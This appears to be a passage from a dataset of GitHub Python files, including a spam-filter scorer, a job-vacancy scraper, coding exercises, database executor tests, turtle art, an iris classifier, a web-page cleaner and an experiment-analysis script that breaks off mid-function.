+{"seq_id":"18633326936","text":"import os\nimport utils\nimport confmat\n\n\ndef quality_score(tp, tn, fp, fn):\n score = (tp + tn)/(tp + tn + 10*fp + fn)\n print(f\"found {tp} spams out of {tp+fn}, found {tn} hams out of {tn+fp}\")\n return score\n\n\ndef compute_quality_for_corpus(path):\n truth_dict = utils.read_classification_from_file(\n os.path.join(path, '!truth.txt'))\n pred_dict = utils.read_classification_from_file(\n os.path.join(path, '!prediction.txt'))\n cm = confmat.BinaryConfusionMatrix(pos_tag='SPAM', neg_tag='OK')\n cm.compute_from_dicts(truth_dict, pred_dict)\n return quality_score(**cm.as_dict())\n\n\nif __name__ == \"__main__\":\n print(compute_quality_for_corpus(os.path.join(\"data\", \"1\")))\n","repo_name":"radkop2000/SpamFilter","sub_path":"quality.py","file_name":"quality.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"24375269217","text":"'''\r\n1. Развернуть у себя на компьютере/виртуальной машине/хостинге MongoDB и реализовать функцию,\r\nзаписывающую собранные вакансии в созданную БД.\r\n'''\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\nimport pandas as pd\r\nimport csv\r\nfrom pymongo import MongoClient\r\n\r\nheader = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}\r\n\r\n\r\ndef get_data(zp):\r\n resp = requests.get(f'https://www.rabota.ru/?sort=relevance&min_salary={zp}', headers=header)\r\n soup = bs(resp.text, 'lxml')\r\n result = []\r\n w = soup.find_all(class_=\"vacancy-preview-card__title\")\r\n p = soup.find_all(class_=\"vacancy-preview-card__salary vacancy-preview-card__salary-blue\")\r\n for i in range(20):\r\n result.append({\r\n 'Вакансия': w[i].text.strip(),\r\n 'Зарплата': p[i].text.strip().replace('\\xa0', ' ')\r\n })\r\n print(result[i])\r\n pd.DataFrame(result).to_csv('dump.csv')\r\n\r\n\r\ndef to_mongo():\r\n client = MongoClient('localhost')\r\n db = client[\"test01\"]\r\n col = db[\"work\"]\r\n with open('dump.csv', 'r', encoding='utf-8') as read_obj:\r\n csv_reader = csv.DictReader(read_obj)\r\n mylist = csv_reader\r\n col.insert_many(mylist)\r\n\r\n\r\nget_data(80000) # Требуемая зарплата\r\nto_mongo()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"softicer-67/PARSING","sub_path":"Lesson_3/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"1698504564","text":"# 1.3\n# URLify: Write a method to replace all spaces in a string with '%20'.\n# You may assume that the string has sufficient space at the end to hold the additional characters,\n# and that you are given the \"true\" length of the string.\n\n# using an additional data structure - O(n) time, O(n) space\ndef URLify(input_str, n):\n url_string = \"\"\n\n for i in range(n):\n if (input_str[i] == ' '):\n url_string += \"%20\"\n else:\n url_string += input_str[i]\n\n return url_string\n\nassert(URLify(\"Mr John Smith \", 13) == \"Mr%20John%20Smith\")\n\n# in-place - O(n) time, O(1) space\ndef URLify2(input_str, n):\n space_count = 0\n\n for i in range(n - 1, -1, -1):\n if (input_str[i] == ' '):\n space_count += 1\n\n shift = space_count * 2\n \n for i in range(n - 1, -1, -1):\n if (input_str[i] == ' '):\n input_str[i + shift] = '0'\n input_str[i + shift - 1] = '2'\n input_str[i + shift - 2] = '%'\n shift -= 2\n else:\n input_str[i + shift] = input_str[i]\n\n return input_str\n\n# because Python strings are immutable, a list is inputted instead of a string\nassert(URLify2(list(\"Mr John Smith \"), 13) == list(\"Mr%20John%20Smith\")) \n\nprint(\"Passed.\")","repo_name":"carterkelly9/CtCI","sub_path":"arrays-and-strings/URLify.py","file_name":"URLify.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"25055104686","text":"import sys\nt = int(input())\n\nf = [0] * 10001\nf[1] = 1\nf[2] = 1\n\nfor j in range(3, 10001):\n f[j] = f[j-1] + f[j-2]\n\nfor i in range(t):\n p, q = map(int, sys.stdin.readline().split())\n print(f\"Case #{i+1}: {f[p]%q}\")\n","repo_name":"oRE-o/Problem-Solving","sub_path":"9711_피보나치.py","file_name":"9711_피보나치.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"}
+{"seq_id":"6888404888","text":"import unittest\nfrom test.unit_tests.executor.utils import DummyExecutor\n\nimport numpy as np\nimport pandas as pd\nfrom mock import MagicMock\n\nfrom evadb.executor.limit_executor import LimitExecutor\nfrom evadb.executor.orderby_executor import OrderByExecutor\nfrom evadb.expression.constant_value_expression import ConstantValueExpression\nfrom evadb.expression.tuple_value_expression import TupleValueExpression\nfrom evadb.models.storage.batch import Batch\nfrom evadb.parser.types import ParserOrderBySortType\nfrom evadb.plan_nodes.limit_plan import LimitPlan\nfrom evadb.plan_nodes.orderby_plan import OrderByPlan\n\n\nclass LimitExecutorTest(unittest.TestCase):\n def test_should_return_smaller_num_rows(self):\n dfs = [\n pd.DataFrame(np.random.randint(0, 100, size=(100, 4)), columns=list(\"ABCD\"))\n for _ in range(4)\n ]\n\n batches = [Batch(frames=df) for df in dfs]\n\n limit_value = 125\n\n plan = LimitPlan(ConstantValueExpression(limit_value))\n\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(batches))\n reduced_batches = list(limit_executor.exec())\n\n total_size = 0\n for batch in reduced_batches:\n total_size += len(batch)\n\n self.assertEqual(total_size, limit_value)\n\n def test_should_return_limit_greater_than_size(self):\n \"\"\"This should return the exact same data\n if the limit value is greater than what is present.\n This will also leave a warning\"\"\"\n\n dfs = [\n pd.DataFrame(np.random.randint(0, 100, size=(100, 4)), columns=list(\"ABCD\"))\n for _ in range(4)\n ]\n\n batches = [Batch(frames=df) for df in dfs]\n\n previous_total_size = 0\n for batch in batches:\n previous_total_size += len(batch)\n\n limit_value = 500\n\n plan = LimitPlan(ConstantValueExpression(limit_value))\n\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(batches))\n reduced_batches = list(limit_executor.exec())\n\n after_total_size = 0\n for batch in reduced_batches:\n after_total_size += len(batch)\n\n self.assertEqual(previous_total_size, after_total_size)\n\n def test_should_return_top_frames_after_sorting(self):\n \"\"\"\n Checks if limit returns the top 2 rows from the data\n after sorting\n\n data (3 batches):\n 'A' 'B' 'C'\n [1, 1, 1]\n ----------\n [1, 5, 6]\n [4, 7, 10]\n ----------\n [2, 9, 7]\n [4, 1, 2]\n [4, 2, 4]\n \"\"\"\n\n df1 = pd.DataFrame(np.array([[1, 1, 1]]), columns=[\"A\", \"B\", \"C\"])\n df2 = pd.DataFrame(np.array([[1, 5, 6], [4, 7, 10]]), columns=[\"A\", \"B\", \"C\"])\n df3 = pd.DataFrame(\n np.array([[2, 9, 7], [4, 1, 2], [4, 2, 4]]), columns=[\"A\", \"B\", \"C\"]\n )\n\n batches = [Batch(frames=df) for df in [df1, df2, df3]]\n\n \"query: .... ORDER BY A ASC, B DESC limit 2\"\n\n plan = OrderByPlan(\n [\n (TupleValueExpression(col_alias=\"A\"), ParserOrderBySortType.ASC),\n (TupleValueExpression(col_alias=\"B\"), ParserOrderBySortType.DESC),\n ]\n )\n\n orderby_executor = OrderByExecutor(MagicMock(), plan)\n orderby_executor.append_child(DummyExecutor(batches))\n\n sorted_batches = list(orderby_executor.exec())\n\n limit_value = 2\n plan = LimitPlan(ConstantValueExpression(limit_value))\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(sorted_batches))\n reduced_batches = list(limit_executor.exec())\n\n # merge everything into one batch\n aggregated_batch = Batch.concat(reduced_batches, copy=False)\n \"\"\"\n A B C\n 0 1 5 6\n 1 1 1 1\n \"\"\"\n\n expected_df1 = pd.DataFrame(\n np.array([[1, 5, 6], [1, 1, 1]]), columns=[\"A\", \"B\", \"C\"]\n )\n\n expected_batches = [Batch(frames=df) for df in [expected_df1]]\n\n self.assertEqual(expected_batches[0], aggregated_batch)\n","repo_name":"georgia-tech-db/evadb","sub_path":"test/unit_tests/executor/test_limit_executor.py","file_name":"test_limit_executor.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":2438,"dataset":"github-code","pt":"39"}
+{"seq_id":"21346829393","text":"import turtle\r\nimport random\r\nimport time\r\n\r\ndef rotl(l, y=1):\r\n if len(l) == 0:\r\n return l\r\n y = y % len(l)\r\n return l[y:] + l[:y]\r\n\r\ndef rotr(l, y=1):\r\n if len(l) == 0:\r\n return l\r\n y = -y % len(l)\r\n return l[y:] + l[:y]\r\n\r\ndef dec2bin(i):\r\n str=\"{0:b}\".format(i)\r\n while len(str)<8:\r\n str='0'+str\r\n num=[0]*8\r\n for i in range(8):\r\n if str[i]=='0':\r\n num[i]=0\r\n else:\r\n num[i]=1\r\n return num\r\n\r\ndef vecadd(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]+b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]+b[i]\r\n return res\r\n\r\ndef xshapes(aTurtle,B,size,sym):\r\n angle=360/sym\r\n aTurtle.goto(0,0)\r\n for j in range(sym):\r\n aTurtle.up()\r\n aTurtle.forward(size)\r\n aTurtle.down()\r\n X=aTurtle.xcor()\r\n Y=aTurtle.ycor()\r\n for k in range(len(B)):\r\n if B[k-1]==1:\r\n aTurtle.left(angle)\r\n else:\r\n aTurtle.right(angle)\r\n aTurtle.forward(size)\r\n aTurtle.pencolor(\"lightgray\")\r\n aTurtle.goto(X,Y)\r\n aTurtle.pencolor(\"black\")\r\n\r\ndef vecsub(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]-b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]-b[i]\r\n return res\r\n\r\ndef vecmul(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]*b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]*b[i]\r\n return res\r\n\r\ndef CAstep(x,rule):\r\n r=dec2bin(rule)\r\n a=vecsub([8],vecadd(rotl(x),vecmul([2],vecadd(x,vecmul([2],rotr(x))))))\r\n n=len(x)\r\n res=[0]*n\r\n for i in range(n): \r\n res[i]=(r[a[i]-1])\r\n return res\r\n\r\ndef rules(n):\r\n bestrules=[18,22,26,28,30,45,50,54,57,58,60,62,70,73,75,78,82,86,89,90,92,94,99,101,102,105,109,110,114,118,122,124,126,129,131,133,\r\n 135,137,141,145,146,147,149,150,153,154,156,157,158,161,163,165,167,169,177,178,179,181,182,186,188,190,193,195,197,\r\n 198,199,210,214,218,225,230,242,246,250]\r\n return bestrules[n]\r\n\r\ndef main():\r\n S=input(\"symmetry \") # Order of symmetry (>3)\r\n symmetry=int(S)\r\n R=input(\"rule \") # Cellular automaton rule(0-255)\r\n rule=rules(int(R)) \r\n G=input(\"generations \") # Number of cellular automaton generations (>0)\r\n generations=int(G)+1 \r\n L=input(\"contour length \") # Length of contour bit string\r\n length=int(L)\r\n Z=input(\"segment size \") # Length of line segments in pixels\r\n size=int(Z) \r\n#\r\n B=[0]*length # \"Standard\" initial conditions\r\n B[int(length/2)]=1\r\n#\r\n tom=turtle.Pen() \r\n tom.speed(0)\r\n turtle.bgcolor(\"white\") # Background color\r\n tom.pencolor(\"black\") # Line color\r\n tom.pensize(1) # Line width\r\n#\r\n for i in range(generations):\r\n tom.hideturtle() \r\n xshapes(tom,B,size,symmetry)\r\n tom.up()\r\n tom.goto(-300,-300)\r\n tom.down()\r\n ID=str(symmetry)+' '+str(int(R))+' '+str(i)+' '+str(length)+' '+str(size)\r\n tom.write(ID,align=\"left\",font=(\"Arial\",16,\"normal\")) \r\n filename='xfamily'+str(i)+'.ps'\r\n turtle.getscreen().getcanvas().postscript(file=filename)\r\n time.sleep(2)\r\n tom.reset()\r\n B=CAstep(B,rule) \r\nmain()\r\n","repo_name":"mohmaj/ArtOfCoding","sub_path":"Chapter 3 Coding for Art/3.3 Abstract Art/3.3.3 Geometric art with Python: adult colouring book series/xfamily.py","file_name":"xfamily.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"}
+{"seq_id":"40738350911","text":"import streamlit as st\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\n# Load the iris dataset\r\niris = load_iris()\r\nX = iris.data\r\ny = iris.target\r\n\r\n# Split the data into training and test sets\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\r\n\r\n# Train a decision tree classifier\r\nclf = DecisionTreeClassifier()\r\nclf.fit(X_train, y_train)\r\n\r\n# Create a Streamlit app\r\nst.title('Iris Species Prediction App')\r\n\r\n# Create sliders for input features\r\nsepal_length = st.slider('Sepal Length', min_value=4.0, max_value=8.0, value=5.0)\r\nsepal_width = st.slider('Sepal Width', min_value=2.0, max_value=5.0, value=3.0)\r\npetal_length = st.slider('Petal Length', min_value=1.0, max_value=7.0, value=4.0)\r\npetal_width = st.slider('Petal Width', min_value=0.1, max_value=3.0, value=1.0)\r\n\r\n# Predict the species of the iris\r\nfeatures = [[sepal_length, sepal_width, petal_length, petal_width]]\r\nprediction = clf.predict(features)\r\nst.subheader(f'The species of the iris is predicted to be: {iris.target_names[prediction][0]}')\r\n","repo_name":"gitlearner246/streamlit_test","sub_path":"iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"6370399722","text":"import re\nfrom operator import itemgetter\n\nimport jieba\nimport zhon.hanzi as chinese\nimport weibo_reader.weiboReader_LineByLine as wr\n\nre_chinese = re.compile('[%s]' % chinese.characters)\n\n\ndef jieba_tokenizer(doc):\n tokens = jieba.cut(doc)\n return [word for word in tokens\n if len(word) > 1\n and re_chinese.match(word)]\n\n\nweiboes = wr.Weibo_Reader_Line_by_Line(r\"../data/weibo.csv\")\ntexts = (item.content for item in weiboes.weibo_items())\njieba_results = (jieba_tokenizer(text) for text in texts)\ndic = dict()\nfor words in jieba_results:\n for word in words:\n dic[word] = dic.get(word, 0) + 1\nsorted_dic = sorted(dic.items(), key=itemgetter(1), reverse=True)\nwith open(r\"..\\data\\word_frequency.txt\", \"w\", encoding=\"utf-8\") as out_f:\n for k, v in sorted_dic:\n out_f.write(\"%s:%d\\n\" % (k, v))\n","repo_name":"KindRoach/SocialOnInternet","sub_path":"weibo_reader/word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"4695788738","text":"#encoding:UTF-8\nimport os\nimport re\nimport sys\nfrom bs4 import BeautifulSoup\nfrom urllib import request\n\ndef getHtml(url):\n\thtmlDoc = request.urlopen(url).read()\n\thtmlDoc = htmlDoc.decode('UTF-8')\n\treturn htmlDoc\n\ndef removeScript(soup):\n\tfor script in soup.find_all('script'):\n\t\tscript.decompose()\n\treturn soup\n\ndef removeTag(soup, tagname, attribute_name, atribute_value_array):\n\tfor attribute_value in atribute_value_array:\n\t\tfor tag in soup.findAll(tagname, {attribute_name : attribute_value}):\n\t\t\ttag.decompose()\n\treturn soup\n\ndef removeSegmentFaultTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\",\n\t\t\t[\"col-md-4\", \"clearfix mt10\", \"widget-box\", \"recommend-post\", \"text-center mt10\", \"global-navTags\",\n\t\t\t\"post-topheader custom-\", \"global-nav sf-header\", \"app-promotion-bar\", \"widget-comments hidden\", \"modal\",\n\t\t\t\"hidden widget-register widget-welcome-question mt20 hidden-xs widget-welcome widget-register-slideUp\",\n\t\t\t\"modal widget-911\", \"col-xs-12 col-md-3 side\"])\n\tsoup = removeTag(soup, \"img\", \"id\", ['icon4weChat', 'icon4weChat'])\n\tsoup = removeTag(soup, \"div\", \"id\", [\"fixedTools\"])\n\tsoup = removeTag(soup, \"footer\", \"id\", [\"footer\"])\n\tsoup = removeTag(soup, \"h2\", \"class\", ['h4 post-comment-title'])\n\treturn soup\n\ndef removeJobboleTag(soup):\n\tnav_classes = [\"menu-nav\", \"grid-12 menu-nav\"]\n\tfor navclass in nav_classes:\n\t\tnav = soup.find(\"nav\", {\"class\": navclass})\n\t\tif nav is not None:\n\t\t\tnav.decompose()\n\tdiv_classes = [\"header-wrapper\", \"grid-4\", \"wp_rp_wrap wp_rp_plain\",\n\t\"dot-box center-align\", \"author-bio-info\", \"navigation margin-20\",\n\t\"post-adds\", \"comments\", \"entry-meta\", \"copyright-area\", \"crayon-toolbar\", \"crayon-main\"]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"full-btm\"})\n\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"full-top\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"author-bio\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"rewardbox\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"breadcrumb\"})\n\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"style\": \"text-align: left;\"})\n\tdiv.decompose()\n\tblockquote = soup.find(\"blockquote\", {\"class\": \"rewards\"})\n\tif blockquote is not None:\n\t\tblockquote.decompose()\n\tfooter = soup.find(\"footer\")\n\tfooter.decompose()\n\tstyle = soup.find(\"style\")\n\tstyle.decompose()\n\tfor textwidget in soup.findAll(\"div\", {\"class\": \"textwidget\"}):\n\t\ttextwidget.decompose()\n\tfor meta in soup.findAll('link'):\n\t\tmeta.decompose()\n\treturn soup\n\ndef removeInfoQCN(soup):\n\tdiv_ides = [\"topInfo\", \"header\", \"contentRatingWidget\", \"comment_here\", \"footer\",\n\t\"forceUpdate_inline\", \"replyPopup\", \"id_geo_banner\", \"forceProfileUpdateArea\", \"overlay_comments\",\n\t\"editCommentPopup\", \"messagePopup\", \"responseContent\"]\n\tfor divid in div_ides:\n\t\tfor div in soup.findAll(\"div\", {\"id\": divid}):\n\t\t\tdiv.decompose()\n\tdiv_classes = [\"related_sponsors visible stacked\", \"random_links\", \"clear\", \"comments\",\n\t\"all_comments\", \"newsletter \", \"bottomContent\", \"login_overlay\", \"article_page_right\",\n\t\"related_sponsors relEdRelRes\", \"intbt\", \"related_sponsors wholething\"]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tspan = soup.find(\"span\", {\"class\": \"author_general\"})\n\tif span is not None:\n\t\tspan.decompose()\n\ta = soup.find(\"a\", {\"class\": \"comments_like\"})\n\tif a is not None:\n\t\ta.decompose()\n\tul = soup.find(\"ul\", {\"class\": \"sh_t\"})\n\tif ul is not None:\n\t\tul.decompose()\n\tfor meta in soup.findAll('link'):\n\t\tmeta.decompose()\n\treturn soup\n\ndef removeITEBlog(soup):\n\tdiv_classes = [\"navbar\", \"banner banner-site\", \"speedbar\", \"tongji\", \"QRcode\", \"comt-title\", \"relates\",\n\t\"widget widget_text\", \"no_webshot\", \"article-social\", \"related_top\", \"banner banner-related\", \"banner banner-comment\",\n\t\"announcement\", \"meta\", \"no_bullets\"\n\t]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tdiv_ides = [\"postcomments\"]\n\tfor divid in div_ides:\n\t\tfor div in soup.findAll(\"div\", {\"id\": divid}):\n\t\t\tdiv.decompose()\n\tfor header in soup.findAll(\"header\", {\"class\": \"header\"}):\n\t\theader.decompose()\n\taside = soup.find(\"aside\")\n\tif aside is not None:\n\t\taside.decompose()\n\tnav = soup.find(\"nav\")\n\tif nav is not None:\n\t\tnav.decompose()\n\tspan = soup.find(\"span\", {\"style\": \"margin-top: 15px; color:red; display:block;text-align:center;\"})\n\tif span is not None:\n\t\tspan.decompose()\n\tfor footer in soup.findAll(\"footer\"):\n\t\tfooter.decompose()\n\treturn soup\n\ndef removeTag(soup, tagname, attribute_name, atribute_value_array):\n\tfor attribute_value in atribute_value_array:\n\t\tfor tag in soup.findAll(tagname, {attribute_name : attribute_value}):\n\t\t\ttag.decompose()\n\treturn soup\n\ndef removeIBMTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\", \n\t\t[\"dw-home-band\", \"ibm-access\", \"ibm-col-6-2 dw-toc-margin\", \"dw-footer-columns\", \"ibm-col-6-2\",\n\t \"ibm-container ibm-alternate ibm-buttons-last\", \"ibm-common-overlay\", \"ibm-no-print\", \"metavalue\"])\n\tsoup = removeTag(soup, \"div\", \"id\", \n\t\t[\"dw-masthead-top-row\", \"ibm-masthead\", \"ibm-footer-module-dwwrapper\", \"ibm-footer\", \"ibm-metrics\"])\n\tsoup = removeTag(soup, \"ul\", \"class\", [\"ibm-portrait-module-list\"])\n\tsoup = removeTag(soup, \"ul\", \"id\", [\"ibm-navigation-trail\"])\n\tsoup = removeTag(soup, \"h2\", \"class\", [\"ibm-alternate-rule ibm-no-print\"])\n\tsoup = removeTag(soup, \"p\", \"class\", [\"ibm-ind-link ibm-back-to-top\"])\n\treturn soup\n\ndef removeFreeBufTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\",\n\t\t[\"panel panel-default\", \"commentshow\", \"comment-list\", \"panel panel-default rec-spe\"])\n\treturn soup\n\nif len(sys.argv) < 2:\n sys.stderr.write('Usage: clean [url] ')\n sys.exit(1)\n\nurl = sys.argv[1]\nhtmlDoc = getHtml(url)\nsoup = BeautifulSoup(htmlDoc, \"lxml\")\nsoup = removeScript(soup)\nif \"segmentfault.com\" in url:\n\tsoup = removeSegmentFaultTag(soup)\nelif \"jobbole.com\" in url:\n\tsoup = removeJobboleTag(soup)\nelif \"www.infoq.com/cn\" in url:\n\tsoup = removeInfoQCN(soup)\nelif \"iteblog\" in url:\n\tsoup = removeITEBlog(soup)\nelif \"www.ibm.com/developerworks\" in url:\n\tsoup = removeIBMTag(soup)\nelif \"www.freebuf.com\" in url:\n\tsoup = removeFreeBufTag(soup)\n\nhtml = soup.prettify(\"utf-8\")\n\nwith open(\"output.html\", \"wb\") as file:\n file.write(html)\n","repo_name":"HungMingWu/CleanerWebsite","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12016187860","text":"import os\nimport glob\nimport json\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom typing import List\nfrom training.utils.reader import DataReader, ModelTrainingData\n\n\ndef get_run_number(run_dir_path: str) -> int:\n return int(run_dir_path.split(\"_\")[-1])\n\n\ndef get_episode_reward(episode_data: List[ModelTrainingData]):\n return np.sum([step.env_data.reward for step in episode_data])\n\n\ndef get_episode_passes(episode_data: List[ModelTrainingData]):\n return np.sum([step.env_data.n_balls_passed for step in episode_data])\n\n\ndef get_action_distribution(run_data_list: List[List[ModelTrainingData]]):\n total_samples = 0\n dist = np.zeros(run_data_list[0][0].model_output.action_space_size)\n for d in run_data_list:\n total_samples += len(d)\n for t_step in d:\n dist[t_step.model_output.role] += 1\n dist = dist/total_samples\n return dist\n\n\ndef total_times_over_runs(times: pd.DataFrame, key: str) -> pd.DataFrame:\n totals = pd.DataFrame()\n times = times.reset_index(drop=True)\n for i, pd_index in enumerate(times.index):\n totals = totals.append([times[key][:i].sum() + times[key][pd_index]], ignore_index=True)\n times[key + \" over runs\"] = totals\n return times\n\n\ndef get_time_spent_simulating_training_per_run(exp_data: pd.DataFrame):\n return total_times_over_runs(exp_data[\"simulated training data time per epoch\"])\n\n\ndef get_total_time_over_runs(exp_data: pd.DataFrame, key: str) -> pd.DataFrame:\n new_data = pd.DataFrame()\n for t_id in exp_data[\"turtle\"].unique():\n for name in exp_data[\"name\"].unique():\n set_with_comp_data = exp_data[(exp_data['name'] == name) & (exp_data['turtle'] == t_id)]\n set_with_comp_data = total_times_over_runs(set_with_comp_data, key)\n new_data = new_data.append(set_with_comp_data, ignore_index=True)\n return new_data\n\n\ndef get_run_turtle_data(data_dir_path: str, turtle_id: int) -> dict:\n run_data = []\n reader = DataReader()\n search_string = data_dir_path + \"/model_data*t\" + str(turtle_id) + \"*.mb\"\n files = glob.glob(search_string)\n if len(files) > 0:\n for index, file in enumerate(files):\n run_data.append(reader.read_data(file))\n action_distribution = get_action_distribution(run_data)\n\n return {\"mean epoch reward\": np.mean([get_episode_reward(episode) for episode in run_data]),\n \"quantile 1st epoch reward\": np.quantile([get_episode_reward(episode) for episode in run_data], 0.25),\n \"quantile 3rd epoch reward\": np.quantile([get_episode_reward(episode) for episode in run_data], 0.75),\n \"mean epoch passes\": np.mean([get_episode_passes(episode) for episode in run_data]),\n \"quantile 1st epoch passes\": np.quantile([get_episode_passes(episode) for episode in run_data], 0.25),\n \"quantile 3rd epoch passes\": np.quantile([get_episode_passes(episode) for episode in run_data], 0.75),\n \"action pass\": action_distribution[0],\n \"action receive\": action_distribution[1],\n \"action move\": action_distribution[2],\n \"action intercept\": action_distribution[3]}\n\n\ndef get_computation_time(run_dir_path: str) -> dict:\n file_path = os.path.join(run_dir_path,\n \"models/training/time_per_training_epoch.timepickle\")\n if os.path.exists(file_path):\n with open(file_path, \"rb\") as file:\n epoch_training_times = pickle.load(file)\n return {\"computation time\": np.sum([np.round(time.microseconds)/1e6 for time in epoch_training_times])}\n return {\"computation time\": 0}\n\n\ndef get_run_meta_data(run_dir_path: str) -> dict:\n with open(os.path.join(run_dir_path, \"config/config.json\"), 'r') as file:\n meta_data_file: dict = json.load(file)\n simulated_epoch_time_for_training = meta_data_file[\"inference\"][\"episodes\"] * meta_data_file[\"inference\"][\"episode_time\"]\n meta_data = {\"name\": meta_data_file[\"name\"],\n \"algorithm\": meta_data_file[\"algorithm\"],\n \"evaluation episodes per epoch\": meta_data_file[\"evaluation\"][\"episodes\"],\n \"evaluation time per episode\": meta_data_file[\"evaluation\"][\"episode_time\"],\n \"training data episodes per epoch\": meta_data_file[\"inference\"][\"episodes\"],\n \"training data time per episode\": meta_data_file[\"inference\"][\"episode_time\"],\n \"simulated training time\": simulated_epoch_time_for_training,\n \"simulated training frames\": round(simulated_epoch_time_for_training*100)}\n\n if meta_data_file[\"algorithm\"] == \"simple_pg\":\n meta_data[\"learning rate\"] = meta_data_file[\"algorithm_settings\"][\"simple_pg\"][\"learning_rate\"]\n meta_data[\"network sizes\"] = meta_data_file[\"algorithm_settings\"][\"simple_pg\"][\"network_hidden_sizes\"]\n elif meta_data_file[\"algorithm\"] == \"vpg\":\n meta_data[\"learning rate\"] = meta_data_file[\"algorithm_settings\"][\"vpg\"][\"policy_learning_rate\"]\n meta_data[\"network sizes\"] = meta_data_file[\"algorithm_settings\"][\"vpg\"][\"network_hidden_sizes\"]\n elif meta_data_file[\"algorithm\"] == \"rule_based\" or meta_data_file[\"algorithm\"] == \"uniform_sampling\":\n meta_data[\"learning rate\"] = None\n meta_data[\"network sizes\"] = None\n meta_data[\"training data time per episode\"] = 0\n meta_data[\"simulated training time\"] = 0\n return meta_data\n\n\ndef get_run_data(run_dir_path: str, turtle_id: int) -> dict:\n run_data_dict = {\"run\": get_run_number(run_dir_path),\n \"turtle\": turtle_id,\n \"training time\": None}\n run_data_dict.update(get_run_meta_data(run_dir_path))\n run_data_dict.update(get_run_turtle_data(os.path.join(run_dir_path, \"evaluation\"), turtle_id))\n run_data_dict.update(get_computation_time(run_dir_path))\n return run_data_dict\n\n\ndef get_experiment_data(experiment_dir_path: str) -> pd.DataFrame:\n experiment_data = pd.DataFrame()\n for t_id in [2, 3]:\n dirs = [d for d in os.listdir(experiment_dir_path)\n if os.path.isdir(os.path.join(experiment_dir_path, d))]\n for run_dir in dirs:\n if not run_dir == \"figures\":\n run_data = get_run_data(\n os.path.join(experiment_dir_path, run_dir), t_id)\n experiment_data = experiment_data.append(run_data, ignore_index=True)\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'computation time')\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'simulated training time')\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'simulated training frames')\n experiment_data[\"training time\"] = experiment_data[\"computation time\"] \\\n + experiment_data[\"simulated training time\"]\n experiment_data[\"training time over runs\"] = experiment_data[\"computation time over runs\"] \\\n + experiment_data[\"simulated training time over runs\"]\n return experiment_data\n\n\ndef get_experiments_data(experiment_dir_paths: List[str]) -> pd.DataFrame:\n experiment_data = pd.DataFrame()\n 